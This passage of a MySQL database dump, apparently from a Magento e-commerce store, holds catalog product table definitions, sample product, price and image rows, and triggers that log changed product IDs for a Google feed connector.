(155, NULL, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(156, NULL, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL),
(157, NULL, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, NULL, 0, 0, 0, 1, 0, 0, 0, 0, 1, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_bundle_option`
--

CREATE TABLE `catalog_product_bundle_option` (
  `option_id` int(10) UNSIGNED NOT NULL COMMENT 'Option ID',
  `parent_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent ID',
  `required` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Required',
  `position` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Position',
  `type` varchar(255) DEFAULT NULL COMMENT 'Type'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Bundle Option';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_bundle_option_value`
--

CREATE TABLE `catalog_product_bundle_option_value` (
  `value_id` int(10) UNSIGNED NOT NULL COMMENT 'Value ID',
  `option_id` int(10) UNSIGNED NOT NULL COMMENT 'Option ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title',
  `parent_product_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent Product ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Bundle Option Value';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_bundle_price_index`
--

CREATE TABLE `catalog_product_bundle_price_index` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer Group ID',
  `min_price` decimal(20,6) NOT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) NOT NULL COMMENT 'Max Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Bundle Price Index';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_bundle_selection`
--

CREATE TABLE `catalog_product_bundle_selection` (
  `selection_id` int(10) UNSIGNED NOT NULL COMMENT 'Selection ID',
  `option_id` int(10) UNSIGNED NOT NULL COMMENT 'Option ID',
  `parent_product_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent Product ID',
  `product_id` int(10) UNSIGNED NOT NULL COMMENT 'Product ID',
  `position` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Position',
  `is_default` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Default',
  `selection_price_type` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Selection Price Type',
  `selection_price_value` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Selection Price Value',
  `selection_qty` decimal(12,4) DEFAULT NULL COMMENT 'Selection Qty',
  `selection_can_change_qty` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Selection Can Change Qty'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Bundle Selection';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_bundle_selection_price`
--

CREATE TABLE `catalog_product_bundle_selection_price` (
  `selection_id` int(10) UNSIGNED NOT NULL COMMENT 'Selection ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `selection_price_type` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Selection Price Type',
  `selection_price_value` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Selection Price Value',
  `parent_product_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent Product ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Bundle Selection Price';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_bundle_stock_index`
--

CREATE TABLE `catalog_product_bundle_stock_index` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `stock_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Stock ID',
  `option_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Option ID',
  `stock_status` smallint(6) DEFAULT 0 COMMENT 'Stock Status'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Bundle Stock Index';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_entity`
--

CREATE TABLE `catalog_product_entity` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `attribute_set_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute Set ID',
  `type_id` varchar(32) NOT NULL DEFAULT 'simple' COMMENT 'Type ID',
  `sku` varchar(64) DEFAULT NULL COMMENT 'SKU',
  `has_options` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Has Options',
  `required_options` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Required Options',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Creation Time',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Update Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Table';

--
-- Dumping data for table `catalog_product_entity`
--

INSERT INTO `catalog_product_entity` (`entity_id`, `attribute_set_id`, `type_id`, `sku`, `has_options`, `required_options`, `created_at`, `updated_at`) VALUES
(1776, 9, 'simple', 'WT06-XL-Yellow', 0, 0, '2020-08-08 01:43:23', '2020-08-08 01:43:23'),
(2052, 10, 'simple', 'WSH12-32-Red', 0, 0, '2020-08-08 01:43:28', '2020-08-08 01:43:28'),
(2053, 10, 'configurable', 'WSH12', 1, 0, '2020-08-08 01:43:28', '2020-08-08 01:43:28'),
(2054, 4, 'simple', 'FF44', 0, 0, '2020-08-17 04:13:53', '2020-08-20 11:18:34'),
(2055, 4, 'simple', 'FF45', 0, 0, '2020-08-17 04:17:20', '2020-08-20 11:22:26'),
(2057, 4, 'simple', 'GGGDF44', 0, 0, '2020-08-17 04:33:37', '2020-08-20 11:21:19'),
(2058, 4, 'simple', 'RAMY SPOT LESS FAIRNESS CREAM', 0, 0, '2020-08-17 04:41:03', '2020-08-20 11:24:30'),
(2059, 4, 'simple', 'HGF64', 0, 0, '2020-08-17 04:47:43', '2020-08-20 03:50:59'),
(2060, 4, 'simple', 'GH786', 0, 0, '2020-08-17 05:09:34', '2020-08-20 11:19:54'),
(2061, 4, 'simple', 'Ramy Spot Cleaner Cream', 0, 0, '2020-08-17 05:49:16', '2020-08-20 11:16:39'),
(2062, 4, 'simple', 'DD53g', 0, 0, '2020-08-17 06:50:39', '2020-08-20 10:35:16'),
(2063, 4, 'simple', 'Ramy Mesta Guard Face', 0, 0, '2020-08-17 07:01:21', '2020-08-20 11:13:59'),
(2064, 10, 'simple', 'New Spot', 0, 0, '2020-08-27 05:53:29', '2021-06-08 07:45:43');

--
-- Triggers `catalog_product_entity`
--
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_after_delete` AFTER DELETE ON `catalog_product_entity` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (OLD.`entity_id`);
INSERT IGNORE INTO `scconnector_google_remove_cl` (`entity_id`) VALUES (OLD.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_after_insert` AFTER INSERT ON `catalog_product_entity` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`);
INSERT IGNORE INTO `scconnector_google_remove_cl` (`entity_id`) VALUES (NEW.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_after_update` AFTER UPDATE ON `catalog_product_entity` FOR EACH ROW BEGIN
IF (NOT(NEW.`entity_id` <=> OLD.`entity_id`) OR NOT(NEW.`attribute_set_id` <=> OLD.`attribute_set_id`) OR NOT(NEW.`type_id` <=> OLD.`type_id`) OR NOT(NEW.`sku` <=> OLD.`sku`) OR NOT(NEW.`has_options` <=> OLD.`has_options`) OR NOT(NEW.`required_options` <=> OLD.`required_options`) OR NOT(NEW.`created_at` <=> OLD.`created_at`)) THEN INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`); END IF;
IF (NOT(NEW.`entity_id` <=> OLD.`entity_id`) OR NOT(NEW.`attribute_set_id` <=> OLD.`attribute_set_id`) OR NOT(NEW.`type_id` <=> OLD.`type_id`) OR NOT(NEW.`sku` <=> OLD.`sku`) OR NOT(NEW.`has_options` <=> OLD.`has_options`) OR NOT(NEW.`required_options` <=> OLD.`required_options`) OR NOT(NEW.`created_at` <=> OLD.`created_at`)) THEN INSERT IGNORE INTO `scconnector_google_remove_cl` (`entity_id`) VALUES (NEW.`entity_id`); END IF;
END
$$
DELIMITER ;

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_entity_datetime`
--

CREATE TABLE `catalog_product_entity_datetime` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` datetime DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Datetime Attribute Backend Table';

--
-- Dumping data for table `catalog_product_entity_datetime`
--

INSERT INTO `catalog_product_entity_datetime` (`value_id`, `attribute_id`, `store_id`, `entity_id`, `value`) VALUES
(15, 94, 0, 2058, '2020-08-12 00:00:00'),
(16, 95, 0, 2058, '2020-08-31 00:00:00'),
(17, 94, 0, 2059, '2020-08-02 00:00:00'),
(18, 94, 0, 2061, '2020-08-01 00:00:00'),
(19, 95, 0, 2061, '2020-10-29 00:00:00'),
(20, 79, 0, 2064, '2020-08-27 00:00:00');

--
-- Triggers `catalog_product_entity_datetime`
--
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_datetime_after_delete` AFTER DELETE ON `catalog_product_entity_datetime` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (OLD.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_datetime_after_insert` AFTER INSERT ON `catalog_product_entity_datetime` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_datetime_after_update` AFTER UPDATE ON `catalog_product_entity_datetime` FOR EACH ROW BEGIN
IF (NOT(NEW.`value_id` <=> OLD.`value_id`) OR NOT(NEW.`attribute_id` <=> OLD.`attribute_id`) OR NOT(NEW.`store_id` <=> OLD.`store_id`) OR NOT(NEW.`entity_id` <=> OLD.`entity_id`) OR NOT(NEW.`value` <=> OLD.`value`)) THEN INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`); END IF;
END
$$
DELIMITER ;

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_entity_decimal`
--

CREATE TABLE `catalog_product_entity_decimal` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` decimal(20,6) DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Decimal Attribute Backend Table';

--
-- Dumping data for table `catalog_product_entity_decimal`
--

INSERT INTO `catalog_product_entity_decimal` (`value_id`, `attribute_id`, `store_id`, `entity_id`, `value`) VALUES
(3385, 77, 0, 1776, 39.000000),
(3386, 82, 0, 1776, 1.000000),
(3909, 77, 0, 2052, 45.000000),
(3910, 82, 0, 2052, 1.000000),
(3911, 77, 0, 2053, 45.000000),
(3924, 77, 0, 2054, 32.000000),
(3925, 82, 0, 2054, 0.000000),
(3926, 77, 0, 2055, 321.000000),
(3927, 82, 0, 2055, 1.000000),
(3930, 77, 0, 2057, 434.000000),
(3931, 82, 0, 2057, 1.000000),
(3932, 77, 0, 2058, 321.000000),
(3933, 82, 0, 2058, 4.000000),
(3934, 77, 0, 2059, 422.000000),
(3935, 82, 0, 2059, 1.000000),
(3936, 77, 0, 2060, 421.000000),
(3937, 82, 0, 2060, 1.000000),
(3938, 77, 0, 2061, 54.000000),
(3939, 82, 0, 2061, 1.000000),
(3940, 77, 0, 2062, 234.000000),
(3941, 82, 0, 2062, 1.000000),
(3942, 77, 0, 2063, 643.000000),
(3943, 77, 0, 2064, 200.000000),
(3944, 82, 0, 2064, 100.000000),
(3945, 78, 0, 2064, 111.000000),
(3946, 119, 0, 2064, 100.000000);

--
-- Triggers `catalog_product_entity_decimal`
--
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_decimal_after_delete` AFTER DELETE ON `catalog_product_entity_decimal` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (OLD.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_decimal_after_insert` AFTER INSERT ON `catalog_product_entity_decimal` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_decimal_after_update` AFTER UPDATE ON `catalog_product_entity_decimal` FOR EACH ROW BEGIN
IF (NOT(NEW.`value_id` <=> OLD.`value_id`) OR NOT(NEW.`attribute_id` <=> OLD.`attribute_id`) OR NOT(NEW.`store_id` <=> OLD.`store_id`) OR NOT(NEW.`entity_id` <=> OLD.`entity_id`) OR NOT(NEW.`value` <=> OLD.`value`)) THEN INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`); END IF;
END
$$
DELIMITER ;

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_entity_gallery`
--

CREATE TABLE `catalog_product_entity_gallery` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `position` int(11) NOT NULL DEFAULT 0 COMMENT 'Position',
  `value` varchar(255) DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Gallery Attribute Backend Table';

--
-- Triggers `catalog_product_entity_gallery`
--
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_gallery_after_delete` AFTER DELETE ON `catalog_product_entity_gallery` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (OLD.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_gallery_after_insert` AFTER INSERT ON `catalog_product_entity_gallery` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_gallery_after_update` AFTER UPDATE ON `catalog_product_entity_gallery` FOR EACH ROW BEGIN
IF (NOT(NEW.`value_id` <=> OLD.`value_id`) OR NOT(NEW.`attribute_id` <=> OLD.`attribute_id`) OR NOT(NEW.`store_id` <=> OLD.`store_id`) OR NOT(NEW.`entity_id` <=> OLD.`entity_id`) OR NOT(NEW.`position` <=> OLD.`position`) OR NOT(NEW.`value` <=> OLD.`value`)) THEN INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`); END IF;
END
$$
DELIMITER ;

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_entity_int`
--

CREATE TABLE `catalog_product_entity_int` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` int(11) DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Integer Attribute Backend Table';

--
-- Dumping data for table `catalog_product_entity_int`
--

INSERT INTO `catalog_product_entity_int` (`value_id`, `attribute_id`, `store_id`, `entity_id`, `value`) VALUES
(10890, 97, 0, 1776, 1),
(10891, 137, 0, 1776, 2),
(10892, 115, 0, 1776, 1),
(10893, 99, 0, 1776, 1),
(10894, 93, 0, 1776, 5487),
(10895, 145, 0, 1776, 5597),
(12630, 97, 0, 2052, 1),
(12631, 137, 0, 2052, 2),
(12632, 115, 0, 2052, 1),
(12633, 99, 0, 2052, 1),
(12634, 93, 0, 2052, 5485),
(12635, 145, 0, 2052, 5602),
(12636, 97, 0, 2053, 1),
(12637, 137, 0, 2053, 2),
(12638, 115, 0, 2053, 1),
(12639, 99, 0, 2053, 4),
(12640, 146, 0, 2053, 0),
(12641, 147, 0, 2053, 0),
(12642, 148, 0, 2053, 1),
(12643, 149, 0, 2053, 0),
(12644, 150, 0, 2053, 0),
(12681, 97, 0, 2054, 1),
(12682, 99, 0, 2054, 4),
(12683, 137, 0, 2054, 2),
(12684, 97, 0, 2055, 1),
(12685, 99, 0, 2055, 4),
(12686, 137, 0, 2055, 2),
(12690, 97, 0, 2057, 1),
(12691, 99, 0, 2057, 4),
(12692, 137, 0, 2057, 2),
(12693, 97, 0, 2058, 1),
(12694, 99, 0, 2058, 4),
(12695, 137, 0, 2058, 2),
(12696, 97, 0, 2059, 1),
(12697, 99, 0, 2059, 4),
(12698, 137, 0, 2059, 2),
(12699, 97, 0, 2060, 1),
(12700, 99, 0, 2060, 4),
(12701, 137, 0, 2060, 2),
(12702, 97, 0, 2061, 1),
(12703, 99, 0, 2061, 4),
(12704, 137, 0, 2061, 2),
(12705, 97, 0, 2062, 1),
(12706, 99, 0, 2062, 4),
(12707, 137, 0, 2062, 2),
(12708, 97, 0, 2063, 1),
(12709, 99, 0, 2063, 4),
(12710, 137, 0, 2063, 2),
(12711, 97, 0, 2064, 1),
(12712, 99, 0, 2064, 4),
(12713, 137, 0, 2064, 2),
(12714, 93, 0, 2064, 5476),
(12715, 146, 0, 2064, 0),
(12716, 147, 0, 2064, 0),
(12717, 148, 0, 2064, 0),
(12718, 149, 0, 2064, 0),
(12719, 150, 0, 2064, 0),
(12720, 145, 0, 2064, 5518);

--
-- Triggers `catalog_product_entity_int`
--
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_int_after_delete` AFTER DELETE ON `catalog_product_entity_int` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (OLD.`entity_id`);
INSERT IGNORE INTO `scconnector_google_remove_cl` (`entity_id`) VALUES (OLD.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_int_after_insert` AFTER INSERT ON `catalog_product_entity_int` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`);
INSERT IGNORE INTO `scconnector_google_remove_cl` (`entity_id`) VALUES (NEW.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_int_after_update` AFTER UPDATE ON `catalog_product_entity_int` FOR EACH ROW BEGIN
IF (NOT(NEW.`value_id` <=> OLD.`value_id`) OR NOT(NEW.`attribute_id` <=> OLD.`attribute_id`) OR NOT(NEW.`store_id` <=> OLD.`store_id`) OR NOT(NEW.`entity_id` <=> OLD.`entity_id`) OR NOT(NEW.`value` <=> OLD.`value`)) THEN INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`); END IF;
IF (NOT(NEW.`value_id` <=> OLD.`value_id`) OR NOT(NEW.`attribute_id` <=> OLD.`attribute_id`) OR NOT(NEW.`store_id` <=> OLD.`store_id`) OR NOT(NEW.`entity_id` <=> OLD.`entity_id`) OR NOT(NEW.`value` <=> OLD.`value`)) THEN INSERT IGNORE INTO `scconnector_google_remove_cl` (`entity_id`) VALUES (NEW.`entity_id`); END IF;
END
$$
DELIMITER ;

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_entity_media_gallery`
--

CREATE TABLE `catalog_product_entity_media_gallery` (
  `value_id` int(10) UNSIGNED NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `value` varchar(255) DEFAULT NULL COMMENT 'Value',
  `media_type` varchar(32) NOT NULL DEFAULT 'image' COMMENT 'Media entry type',
  `disabled` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Visibility status'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Media Gallery Attribute Backend Table';

--
-- Dumping data for table `catalog_product_entity_media_gallery`
--

INSERT INTO `catalog_product_entity_media_gallery` (`value_id`, `attribute_id`, `value`, `media_type`, `disabled`) VALUES
(7, 90, '/p/n/pngtree-female-fragrance-woman-maintenance-png-image_353046.jpg', 'image', 0),
(8, 90, '/p/n/pngtree-female-fragrance-woman-maintenance-png-image_353046_1.jpg', 'image', 0),
(9, 90, '/m/b/mb01-blue-0.jpg', 'image', 0),
(10, 90, '/m/b/mb04-black-0.jpg', 'image', 0),
(11, 90, '/m/b/mb04-black-0_alt1.jpg', 'image', 0),
(12, 90, '/m/b/mb03-black-0.jpg', 'image', 0),
(13, 90, '/m/b/mb03-black-0_alt1.jpg', 'image', 0),
(14, 90, '/m/b/mb05-black-0.jpg', 'image', 0),
(15, 90, '/m/b/mb06-gray-0.jpg', 'image', 0),
(16, 90, '/m/b/mb02-gray-0.jpg', 'image', 0),
(17, 90, '/m/b/mb02-blue-0.jpg', 'image', 0),
(18, 90, '/u/b/ub02-black-0.jpg', 'image', 0),
(19, 90, '/w/b/wb01-black-0.jpg', 'image', 0),
(20, 90, '/w/b/wb02-green-0.jpg', 'image', 0),
(21, 90, '/w/b/wb05-red-0.jpg', 'image', 0),
(22, 90, '/w/b/wb06-red-0.jpg', 'image', 0),
(23, 90, '/w/b/wb06-red-0_alt1.jpg', 'image', 0),
(24, 90, '/w/b/wb03-purple-0.jpg', 'image', 0),
(25, 90, '/w/b/wb07-brown-0.jpg', 'image', 0),
(26, 90, '/w/b/wb04-blue-0.jpg', 'image', 0),
(27, 90, '/u/g/ug06-lb-0.jpg', 'image', 0),
(28, 90, '/u/g/ug07-bk-0.jpg', 'image', 0),
(29, 90, '/u/g/ug07-bk-0_alt1.jpg', 'image', 0),
(30, 90, '/u/g/ug04-bk-0.jpg', 'image', 0),
(31, 90, '/u/g/ug02-bk-0.jpg', 'image', 0),
(32, 90, '/u/g/ug05-gr-0.jpg', 'image', 0),
(33, 90, '/u/g/ug01-bk-0.jpg', 'image', 0),
(34, 90, '/l/u/luma-yoga-brick.jpg', 'image', 0),
(35, 90, '/l/u/luma-foam-roller.jpg', 'image', 0),
(36, 90, '/u/g/ug03-bk-0.jpg', 'image', 0),
(37, 90, '/l/u/luma-stability-ball-gray.jpg', 'image', 0),
(38, 90, '/l/u/luma-stability-ball-pink.jpg', 'image', 0),
(39, 90, '/l/u/luma-stability-ball.jpg', 'image', 0),
(40, 90, '/l/u/luma-stability-ball-gray.jpg', 'image', 0),
(41, 90, '/l/u/luma-stability-ball-pink.jpg', 'image', 0),
(42, 90, '/l/u/luma-stability-ball.jpg', 'image', 0),
(43, 90, '/l/u/luma-stability-ball-gray.jpg', 'image', 0),
(44, 90, '/l/u/luma-stability-ball-pink.jpg', 'image', 0),
(45, 90, '/l/u/luma-stability-ball.jpg', 'image', 0),
(46, 90, '/l/u/luma-yoga-strap.jpg', 'image', 0),
(47, 90, '/l/u/luma-yoga-strap.jpg', 'image', 0),
(48, 90, '/l/u/luma-yoga-strap.jpg', 'image', 0),
(49, 90, '/m/g/mg04-bk-0.jpg', 'image', 0),
(50, 90, '/m/g/mg01-bk-0.jpg', 'image', 0),
(51, 90, '/m/g/mg03-br-0.jpg', 'image', 0),
(52, 90, '/m/g/mg05-br-0.jpg', 'image', 0),
(53, 90, '/m/g/mg02-bk-0.jpg', 'image', 0),
(54, 90, '/w/g/wg09-gr-0.jpg', 'image', 0),
(55, 90, '/w/g/wg01-bk-0.jpg', 'image', 0),
(56, 90, '/w/g/wg03-gr-0.jpg', 'image', 0),
(57, 90, '/w/g/wg03-sa-0.jpg', 'image', 0),
(58, 90, '/w/g/wg02-bk-0.jpg', 'image', 0),
(59, 90, '/l/u/luma-yoga-strap-set.jpg', 'image', 0),
(60, 90, '/l/u/luma-yoga-kit-2.jpg', 'image', 0),
(61, 90, '/l/t/lt01.jpg', 'image', 0),
(62, 90, '/l/t/lt02.jpg', 'image', 0),
(63, 90, '/l/t/lt03.jpg', 'image', 0),
(64, 90, '/l/t/lt04.jpg', 'image', 0),
(65, 90, '/l/t/lt05.jpg', 'image', 0),
(66, 90, '/l/t/lt06.jpg', 'image', 0),
(67, 90, '/m/h/mh01-black_main_1.jpg', 'image', 0),
(68, 90, '/m/h/mh01-gray_main_1.jpg', 'image', 0),
(69, 90, '/m/h/mh01-gray_alt1_1.jpg', 'image', 0),
(70, 90, '/m/h/mh01-gray_back_1.jpg', 'image', 0),
(71, 90, '/m/h/mh01-orange_main_1.jpg', 'image', 0),
(72, 90, '/m/h/mh01-black_main_1.jpg', 'image', 0),
(73, 90, '/m/h/mh01-gray_main_1.jpg', 'image', 0),
(74, 90, '/m/h/mh01-gray_alt1_1.jpg', 'image', 0),
(75, 90, '/m/h/mh01-gray_back_1.jpg', 'image', 0),
(76, 90, '/m/h/mh01-orange_main_1.jpg', 'image', 0),
(77, 90, '/m/h/mh01-black_main_1.jpg', 'image', 0),
(78, 90, '/m/h/mh01-gray_main_1.jpg', 'image', 0),
(79, 90, '/m/h/mh01-gray_alt1_1.jpg', 'image', 0),
(80, 90, '/m/h/mh01-gray_back_1.jpg', 'image', 0),
(81, 90, '/m/h/mh01-orange_main_1.jpg', 'image', 0),
(82, 90, '/m/h/mh01-black_main_1.jpg', 'image', 0),
(83, 90, '/m/h/mh01-gray_main_1.jpg', 'image', 0),
(84, 90, '/m/h/mh01-gray_alt1_1.jpg', 'image', 0),
(85, 90, '/m/h/mh01-gray_back_1.jpg', 'image', 0),
(86, 90, '/m/h/mh01-orange_main_1.jpg', 'image', 0),
(87, 90, '/m/h/mh01-black_main_1.jpg', 'image', 0),
(88, 90, '/m/h/mh01-gray_main_1.jpg', 'image', 0),
(89, 90, '/m/h/mh01-gray_alt1_1.jpg', 'image', 0),
(90, 90, '/m/h/mh01-gray_back_1.jpg', 'image', 0),
(91, 90, '/m/h/mh01-orange_main_1.jpg', 'image', 0),
(92, 90, '/m/h/mh01-gray_main_1.jpg', 'image', 0),
(93, 90, '/m/h/mh01-gray_alt1_1.jpg', 'image', 0),
(94, 90, '/m/h/mh01-gray_back_1.jpg', 'image', 0),
(95, 90, '/m/h/mh02-black_main_1.jpg', 'image', 0),
(96, 90, '/m/h/mh02-black_alt1_1.jpg', 'image', 0),
(97, 90, '/m/h/mh02-black_back_1.jpg', 'image', 0),
(98, 90, '/m/h/mh02-purple_main_1.jpg', 'image', 0),
(99, 90, '/m/h/mh02-red_main_1.jpg', 'image', 0),
(100, 90, '/m/h/mh02-black_main_1.jpg', 'image', 0),
(101, 90, '/m/h/mh02-black_alt1_1.jpg', 'image', 0),
(102, 90, '/m/h/mh02-black_back_1.jpg', 'image', 0),
(103, 90, '/m/h/mh02-purple_main_1.jpg', 'image', 0),
(104, 90, '/m/h/mh02-red_main_1.jpg', 'image', 0),
(105, 90, '/m/h/mh02-black_main_1.jpg', 'image', 0),
(106, 90, '/m/h/mh02-black_alt1_1.jpg', 'image', 0),
(107, 90, '/m/h/mh02-black_back_1.jpg', 'image', 0),
(108, 90, '/m/h/mh02-purple_main_1.jpg', 'image', 0),
(109, 90, '/m/h/mh02-red_main_1.jpg', 'image', 0),
(110, 90, '/m/h/mh02-black_main_1.jpg', 'image', 0),
(111, 90, '/m/h/mh02-black_alt1_1.jpg', 'image', 0),
(112, 90, '/m/h/mh02-black_back_1.jpg', 'image', 0),
(113, 90, '/m/h/mh02-purple_main_1.jpg', 'image', 0),
(114, 90, '/m/h/mh02-red_main_1.jpg', 'image', 0),
(115, 90, '/m/h/mh02-black_main_1.jpg', 'image', 0),
(116, 90, '/m/h/mh02-black_alt1_1.jpg', 'image', 0),
(117, 90, '/m/h/mh02-black_back_1.jpg', 'image', 0),
